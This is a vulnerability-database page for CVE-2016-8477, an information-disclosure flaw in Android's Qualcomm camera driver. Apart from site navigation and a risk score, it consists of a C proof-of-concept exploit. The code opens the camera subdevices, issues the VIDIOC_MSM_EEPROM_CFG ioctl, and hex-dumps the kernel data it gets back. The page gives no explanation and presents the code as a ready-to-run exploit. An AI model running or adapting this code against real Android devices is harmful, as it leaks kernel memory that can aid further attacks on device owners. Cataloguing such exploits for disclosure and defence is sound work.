Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:92873
HistoryApr 04, 2017 - 12:00 a.m.

Google Android Qualcomm Camera Driver Multiple Information Disclosure Vulnerabilities(CVE-2016-8477)

2017-04-0400:00:00
Root
www.seebug.org
30

0.001 Low

EPSS

Percentile

48.7%

JSON

No description provided by source.


                                                #include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/videodev2.h>
#include <linux/types.h>

#define MAX_SENSOR_NAME 32

enum eeprom_cfg_type_t {
	CFG_EEPROM_GET_INFO,
	CFG_EEPROM_GET_CAL_DATA,
	CFG_EEPROM_READ_CAL_DATA,
	CFG_EEPROM_WRITE_DATA,
	CFG_EEPROM_GET_MM_INFO,
};

struct eeprom_get_t {
	uint32_t num_bytes;
};

struct eeprom_read_t {
	uint8_t *dbuffer;
	uint32_t num_bytes;
};

struct eeprom_write_t {
	uint8_t *dbuffer;
	uint32_t num_bytes;
};

struct eeprom_get_cmm_t {
	uint32_t cmm_support;
	uint32_t cmm_compression;
	uint32_t cmm_size;
};

struct msm_eeprom_cfg_data {
	enum eeprom_cfg_type_t cfgtype;
	uint8_t is_supported;
	union {
		char eeprom_name[MAX_SENSOR_NAME];
		struct eeprom_get_t get_data;
		struct eeprom_read_t read_data;
		struct eeprom_write_t write_data;
		struct eeprom_get_cmm_t get_cmm_data;
	} cfg;
};

#define VIDIOC_MSM_EEPROM_CFG \
	_IOWR('V', BASE_VIDIOC_PRIVATE + 8, struct msm_eeprom_cfg_data)


int main(void)
{
	char subdev[32] = { 0 };
	int i, j;
	int fd;
	int ret;
	struct msm_eeprom_cfg_data request = { 0 };
	
	printf("=== Kernel VIDIOC_MSM_EEPROM_CFG Info Leak ===\n");
	
	for (i = 9; i < 11; i++) {
		
		if (snprintf(subdev, sizeof(subdev), "/dev/v4l-subdev%d", i) < 0) {
			printf("Failed to snprintf\n");
			exit(EXIT_FAILURE);
		}
		
		fd = open(subdev, O_RDWR);

		if (fd < 0) {
			printf("Couldn't open %s with error %s\n", subdev, strerror(errno));
			continue;
		}
		
		ret = ioctl(fd, VIDIOC_MSM_EEPROM_CFG, &request);
		if (ret > 0) {
			printf("Found subdev that exports ioctl on %s\n", subdev);

			return fd;
		}
		
		// print string data from kernel
		printf("Got name: %s\n", request.cfg.eeprom_name);

		printf("Dump of entire name buf:\n");
	
		// now dump the entire data from kernel... ;-)
		for(j = 0; j < sizeof(request.cfg.eeprom_name); j++) {
			printf("%2X ", request.cfg.eeprom_name[j]);
		}

		printf("\n");

		memset(&request, 0x00, sizeof(request));

		close(fd);
	}
	
	return 0;
}

Related

cve 1
prion 1
ubuntucve 1
androidsecurity 1
cve
cve
CVE-2016-8477
2017-03-08 01:59:00
prion
prion
Information disclosure
2017-03-08 01:59:00
ubuntucve
ubuntucve
CVE-2016-8477
2017-03-08 00:00:00
androidsecurity
androidsecurity
Android Security Bulletin—March 2017
2017-03-06 00:00:00

0.001 Low

EPSS

Percentile

48.7%

JSON
Related for SSV:92873
cve1prion1ubuntucve1androidsecurity1